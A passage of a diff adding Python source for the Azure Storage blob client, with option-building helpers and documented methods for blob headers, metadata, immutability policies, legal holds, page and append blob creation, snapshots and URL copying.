blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + options = { + 'timeout': kwargs.pop('timeout', None), + 'blob_http_headers': blob_headers, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def set_http_headers(self, content_settings=None, **kwargs): + # type: (Optional[ContentSettings], **Any) -> None + """Sets system properties on the blob. + + If one property is set for the content_settings, all properties will be overridden. + + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. 
+ Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: Dict[str, Any] + """ + options = self._set_http_headers_options(content_settings=content_settings, **kwargs) + try: + return self._client.blob.set_http_headers(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _set_blob_metadata_options(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + options = { + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers, + 'headers': headers} + options.update(kwargs) + return options + + @distributed_trace + def set_blob_metadata(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Union[str, datetime]] + """Sets user-defined metadata for the blob as one or more name-value pairs. + + :param metadata: + Dict containing name and value pairs. Each call to this operation + replaces all existing metadata attached to the blob. To remove all + metadata from the blob, call this operation with no metadata headers. + :type metadata: dict(str, str) + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). 
Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blob with a matching value.
+            eg. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+
+        :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+            Encrypts the data on the service-side with the given key.
+            Use of customer-provided keys must be done over HTTPS.
+            As the encryption key itself is provided in the request,
+            a secure connection must be established to transfer the key.
+        :keyword str encryption_scope:
+            A predefined encryption scope used to encrypt the data on the service. An encryption
+            scope can be created using the Management API and referenced here by name. If a default
+            encryption scope has been defined at the container, this value will override it if the
+            container-level scope is configured to allow overrides. Otherwise an error will be raised.
+
+            .. versionadded:: 12.2.0
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Blob-updated property dict (Etag and last modified)
+        """
+        options = self._set_blob_metadata_options(metadata=metadata, **kwargs)
+        try:
+            return self._client.blob.set_metadata(**options)  # type: ignore
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    @distributed_trace
+    def set_immutability_policy(self, immutability_policy, **kwargs):
+        # type: (ImmutabilityPolicy, **Any) -> Dict[str, str]
+        """The Set Immutability Policy operation sets the immutability policy on the blob.
+
+        .. versionadded:: 12.10.0
+            This operation was introduced in API version '2020-10-02'.
+
+        :param ~azure.storage.blob.ImmutabilityPolicy immutability_policy:
+            Specifies the immutability policy of a blob, blob snapshot or blob version.
+
+            .. versionadded:: 12.10.0
+                This was introduced in API version '2020-10-02'.
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Response headers for the operation (immutability policy expiry and mode).
+        :rtype: Dict[str, str]
+        """
+
+        kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time
+        kwargs['immutability_policy_mode'] = immutability_policy.policy_mode
+        return self._client.blob.set_immutability_policy(cls=return_response_headers, **kwargs)
+
+    @distributed_trace
+    def delete_immutability_policy(self, **kwargs):
+        # type: (**Any) -> None
+        """The Delete Immutability Policy operation deletes the immutability policy on the blob.
+
+        .. versionadded:: 12.10.0
+            This operation was introduced in API version '2020-10-02'.
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :rtype: None
+        """
+
+        self._client.blob.delete_immutability_policy(**kwargs)
+
+    @distributed_trace
+    def set_legal_hold(self, legal_hold, **kwargs):
+        # type: (bool, **Any) -> Dict[str, Union[str, datetime, bool]]
+        """The Set Legal Hold operation sets a legal hold on the blob.
+
+        .. versionadded:: 12.10.0
+            This operation was introduced in API version '2020-10-02'.
+
+        :param bool legal_hold:
+            Specified if a legal hold should be set on the blob.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Response headers for the operation (etag, last modified, legal hold status).
+ :rtype: Dict[str, Union[str, datetime, bool]] + """ + + return self._client.blob.set_legal_hold(legal_hold, cls=return_response_headers, **kwargs) + + def _create_page_blob_options( # type: ignore + self, size, # type: int + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + premium_page_blob_tier=None, # type: Optional[Union[str, PremiumPageBlobTier]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + blob_headers = None + if content_settings: + blob_headers = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + + sequence_number = kwargs.pop('sequence_number', None) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + immutability_policy = kwargs.pop('immutability_policy', None) + if immutability_policy: + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + + if premium_page_blob_tier: + try: + headers['x-ms-access-tier'] = premium_page_blob_tier.value # type: ignore + except AttributeError: + headers['x-ms-access-tier'] = premium_page_blob_tier # type: ignore + + blob_tags_string = serialize_blob_tags_header(kwargs.pop('tags', None)) + + options = { + 'content_length': 0, + 'blob_content_length': size, + 'blob_sequence_number': sequence_number, + 'blob_http_headers': blob_headers, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'blob_tags_string': blob_tags_string, + 'cls': return_response_headers, + 'headers': headers} + options.update(kwargs) + return options + + @distributed_trace + def create_page_blob( # type: ignore + self, size, # type: int + content_settings=None, # type: Optional[ContentSettings] + metadata=None, # type: Optional[Dict[str, str]] + premium_page_blob_tier=None, # type: Optional[Union[str, PremiumPageBlobTier]] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """Creates a new Page Blob of the specified size. + + :param int size: + This specifies the maximum size for the page blob, up to 1 TB. + The page blob size must be aligned to a 512-byte boundary. + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. 
+        :type metadata: dict(str, str)
+        :param ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier:
+            A page blob tier value to set the blob to. The tier correlates to the size of the
+            blob and number of allowed IOPS. This is only applicable to page blobs on
+            premium storage accounts.
+        :keyword tags:
+            Name-value pairs associated with the blob as tags. Tags are case-sensitive.
+            The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters,
+            and tag values must be between 0 and 256 characters.
+            Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9),
+            space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_)
+
+            .. versionadded:: 12.4.0
+
+        :paramtype tags: dict(str, str)
+        :keyword int sequence_number:
+            Only for Page blobs. The sequence number is a user-controlled value that you can use to
+            track requests. The value of the sequence number must be between 0
+            and 2^63 - 1. The default value is 0.
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy:
+            Specifies the immutability policy of a blob, blob snapshot or blob version.
+
+            .. versionadded:: 12.10.0
+                This was introduced in API version '2020-10-02'.
+
+        :keyword bool legal_hold:
+            Specified if a legal hold should be set on the blob.
+
+            .. versionadded:: 12.10.0
+                This was introduced in API version '2020-10-02'.
+
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+            Encrypts the data on the service-side with the given key.
+            Use of customer-provided keys must be done over HTTPS.
+            As the encryption key itself is provided in the request,
+            a secure connection must be established to transfer the key.
+        :keyword str encryption_scope:
+            A predefined encryption scope used to encrypt the data on the service. An encryption
+            scope can be created using the Management API and referenced here by name. If a default
+            encryption scope has been defined at the container, this value will override it if the
+            container-level scope is configured to allow overrides. Otherwise an error will be raised.
+
+            .. versionadded:: 12.2.0
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Blob-updated property dict (Etag and last modified).
+ :rtype: dict[str, Any] + """ + options = self._create_page_blob_options( + size, + content_settings=content_settings, + metadata=metadata, + premium_page_blob_tier=premium_page_blob_tier, + **kwargs) + try: + return self._client.page_blob.create(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _create_append_blob_options(self, content_settings=None, metadata=None, **kwargs): + # type: (Optional[ContentSettings], Optional[Dict[str, str]], **Any) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + blob_headers = None + if content_settings: + blob_headers = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + immutability_policy = kwargs.pop('immutability_policy', None) + if immutability_policy: + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + + blob_tags_string = serialize_blob_tags_header(kwargs.pop('tags', None)) + + options = { + 'content_length': 0, + 'blob_http_headers': blob_headers, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'blob_tags_string': blob_tags_string, + 'cls': return_response_headers, + 'headers': headers} + options.update(kwargs) + return options + + @distributed_trace + def create_append_blob(self, content_settings=None, metadata=None, **kwargs): + # type: (Optional[ContentSettings], Optional[Dict[str, str]], **Any) -> Dict[str, Union[str, datetime]] + """Creates a new Append Blob. + + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. 
+ :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). 
+ :rtype: dict[str, Any] + """ + options = self._create_append_blob_options( + content_settings=content_settings, + metadata=metadata, + **kwargs) + try: + return self._client.append_blob.create(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _create_snapshot_options(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers, + 'headers': headers} + options.update(kwargs) + return options + + @distributed_trace + def create_snapshot(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Union[str, datetime]] + """Creates a snapshot of the blob. + + A snapshot is a read-only version of a blob that's taken at a point in time. + It can be read, copied, or deleted, but not modified. Snapshots provide a way + to back up a blob as it appears at a moment in time. + + A snapshot of a blob has the same name as the base blob from which the snapshot + is taken, with a DateTime value appended to indicate the time at which the + snapshot was taken. + + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on destination blob with a matching value. + + .. versionadded:: 12.4.0 + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. 
+            Use of customer-provided keys must be done over HTTPS.
+            As the encryption key itself is provided in the request,
+            a secure connection must be established to transfer the key.
+        :keyword str encryption_scope:
+            A predefined encryption scope used to encrypt the data on the service. An encryption
+            scope can be created using the Management API and referenced here by name. If a default
+            encryption scope has been defined at the container, this value will override it if the
+            container-level scope is configured to allow overrides. Otherwise an error will be raised.
+
+            .. versionadded:: 12.2.0
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Blob-updated property dict (Snapshot ID, Etag, and last modified).
+        :rtype: dict[str, Any]
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_common.py
+                :start-after: [START create_blob_snapshot]
+                :end-before: [END create_blob_snapshot]
+                :language: python
+                :dedent: 8
+                :caption: Create a snapshot of the blob.
+        """
+        options = self._create_snapshot_options(metadata=metadata, **kwargs)
+        try:
+            return self._client.blob.create_snapshot(**options)  # type: ignore
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    def _start_copy_from_url_options(self, source_url, metadata=None, incremental_copy=False, **kwargs):
+        # type: (str, Optional[Dict[str, str]], bool, **Any) -> Dict[str, Any]
+        headers = kwargs.pop('headers', {})
+        headers.update(add_metadata_headers(metadata))
+        if 'source_lease' in kwargs:
+            source_lease = kwargs.pop('source_lease')
+            try:
+                headers['x-ms-source-lease-id'] = source_lease.id
+            except AttributeError:
+                headers['x-ms-source-lease-id'] = source_lease
+
+        tier = kwargs.pop('premium_page_blob_tier', None) or kwargs.pop('standard_blob_tier', None)
+        tags = kwargs.pop('tags', None)
+
+        # Options only available for sync copy
+        requires_sync = kwargs.pop('requires_sync', None)
+        encryption_scope_str = kwargs.pop('encryption_scope', None)
+        source_authorization = kwargs.pop('source_authorization', None)
+        # If tags is a str, interpret that as copy_source_tags
+        copy_source_tags = isinstance(tags, str)
+
+        if incremental_copy:
+            if source_authorization:
+                raise ValueError("Source authorization tokens are not applicable for incremental copying.")
+            if copy_source_tags:
+                raise ValueError("Copying source tags is not applicable for incremental copying.")
+
+        # TODO: refactor start_copy_from_url api in _blob_client.py. Call _generated/_blob_operations.py copy_from_url
+        #  when requires_sync=True is set.
+        #  Currently both sync copy and async copy are calling _generated/_blob_operations.py start_copy_from_url.
+        #  As sync copy diverges more from async copy, more problems will surface.
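+        # The three sync-copy-only options popped above are validated below: when
+        # requires_sync is not True, passing encryption_scope, source_authorization
+        # or tags="COPY" raises ValueError. A hedged usage sketch (the client and
+        # URL names are placeholders, not part of this module):
+        #
+        #   blob_client.start_copy_from_url(
+        #       src_url, requires_sync=True, encryption_scope="myscope")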
+ if requires_sync is True: + headers['x-ms-requires-sync'] = str(requires_sync) + if encryption_scope_str: + headers['x-ms-encryption-scope'] = encryption_scope_str + if source_authorization: + headers['x-ms-copy-source-authorization'] = source_authorization + if copy_source_tags: + headers['x-ms-copy-source-tag-option'] = tags + else: + if encryption_scope_str: + raise ValueError( + "Encryption_scope is only supported for sync copy, please specify requires_sync=True") + if source_authorization: + raise ValueError( + "Source authorization tokens are only supported for sync copy, please specify requires_sync=True") + if copy_source_tags: + raise ValueError( + "Copying source tags is only supported for sync copy, please specify requires_sync=True") + + timeout = kwargs.pop('timeout', None) + dest_mod_conditions = get_modify_conditions(kwargs) + blob_tags_string = serialize_blob_tags_header(tags) if not copy_source_tags else None + + immutability_policy = kwargs.pop('immutability_policy', None) + if immutability_policy: + kwargs['immutability_policy_expiry'] = immutability_policy.expiry_time + kwargs['immutability_policy_mode'] = immutability_policy.policy_mode + + options = { + 'copy_source': source_url, + 'seal_blob': kwargs.pop('seal_destination_blob', None), + 'timeout': timeout, + 'modified_access_conditions': dest_mod_conditions, + 'blob_tags_string': blob_tags_string, + 'headers': headers, + 'cls': return_response_headers, + } + if not incremental_copy: + source_mod_conditions = get_source_conditions(kwargs) + dest_access_conditions = get_access_conditions(kwargs.pop('destination_lease', None)) + options['source_modified_access_conditions'] = source_mod_conditions + options['lease_access_conditions'] = dest_access_conditions + options['tier'] = tier.value if tier else None + options.update(kwargs) + return options + + @distributed_trace + def start_copy_from_url(self, source_url, metadata=None, incremental_copy=False, **kwargs): + # type: (str, Optional[Dict[str, str]], bool, **Any) -> Dict[str, Union[str, datetime]] + """Copies a blob from the given URL. + + This operation returns a dictionary containing `copy_status` and `copy_id`, + which can be used to check the status of or abort the copy operation. + `copy_status` will be 'success' if the copy completed synchronously or + 'pending' if the copy has been started asynchronously. For asynchronous copies, + the status can be checked by polling the :func:`get_blob_properties` method and + checking the copy status. Set `requires_sync` to True to force the copy to be synchronous. + The Blob service copies blobs on a best-effort basis. + + The source blob for a copy operation may be a block blob, an append blob, + or a page blob. If the destination blob already exists, it must be of the + same blob type as the source blob. Any existing destination blob will be + overwritten. The destination blob cannot be modified while a copy operation + is in progress. + + When copying from a page blob, the Blob service creates a destination page + blob of the source blob's length, initially containing all zeroes. Then + the source page ranges are enumerated, and non-empty ranges are copied. + + For a block blob or an append blob, the Blob service creates a committed + blob of zero length before returning from this operation. When copying + from a block blob, all committed blocks and their block IDs are copied. + Uncommitted blocks are not copied. 
At the end of the copy operation, the
+        destination blob will have the same committed block count as the source.
+
+        When copying from an append blob, all committed blocks are copied. At the
+        end of the copy operation, the destination blob will have the same committed
+        block count as the source.
+
+        :param str source_url:
+            A URL of up to 2 KB in length that specifies a file or blob.
+            The value should be URL-encoded as it would appear in a request URI.
+            If the source is in another account, the source must either be public
+            or must be authenticated via a shared access signature. If the source
+            is public, no authentication is required.
+            Examples:
+            https://myaccount.blob.core.windows.net/mycontainer/myblob
+
+            https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot=
+
+            https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken
+        :param metadata:
+            Name-value pairs associated with the blob as metadata. If no name-value
+            pairs are specified, the operation will copy the metadata from the
+            source blob or file to the destination blob. If one or more name-value
+            pairs are specified, the destination blob is created with the specified
+            metadata, and metadata is not copied from the source blob or file.
+        :type metadata: dict(str, str)
+        :param bool incremental_copy:
+            Copies the snapshot of the source page blob to a destination page blob.
+            The snapshot is copied such that only the differential changes between
+            the previously copied snapshot and the new snapshot are transferred to
+            the destination. The copied snapshots are complete copies of the original
+            snapshot and can be read or copied from as usual. Defaults to False.
+        :keyword tags:
+            Name-value pairs associated with the blob as tags. Tags are case-sensitive.
+            The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters,
+            and tag values must be between 0 and 256 characters.
+            Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9),
+            space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_).
+
+            The (case-sensitive) literal "COPY" can instead be passed to copy tags from the source blob.
+            This option is only available when `incremental_copy=False` and `requires_sync=True`.
+
+            .. versionadded:: 12.4.0
+
+        :paramtype tags: dict(str, str) or Literal["COPY"]
+        :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy:
+            Specifies the immutability policy of a blob, blob snapshot or blob version.
+
+            .. versionadded:: 12.10.0
+                This was introduced in API version '2020-10-02'.
+
+        :keyword bool legal_hold:
+            Specified if a legal hold should be set on the blob.
+
+            .. versionadded:: 12.10.0
+                This was introduced in API version '2020-10-02'.
+
+        :keyword ~datetime.datetime source_if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this conditional header to copy the blob only if the source
+            blob has been modified since the specified date/time.
+        :keyword ~datetime.datetime source_if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+ Specify this conditional header to copy the blob only if the source blob + has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only + if the destination blob has been modified since the specified date/time. + If the destination blob has not been modified, the Blob service returns + status code 412 (Precondition Failed). + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this conditional header to copy the blob only + if the destination blob has not been modified since the specified + date/time. If the destination blob has been modified, the Blob service + returns status code 412 (Precondition Failed). + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword destination_lease: + The lease ID specified for this header must match the lease ID of the + destination blob. If the request does not include the lease ID or it is not + valid, the operation fails with status code 412 (Precondition Failed). + :paramtype destination_lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword source_lease: + Specify this to perform the Copy Blob operation only if + the lease ID given matches the active lease ID of the source blob. + :paramtype source_lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :keyword bool seal_destination_blob: + Seal the destination append blob. This operation is only for append blob. + + .. versionadded:: 12.4.0 + + :keyword bool requires_sync: + Enforces that the service will not return a response until the copy is complete. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the 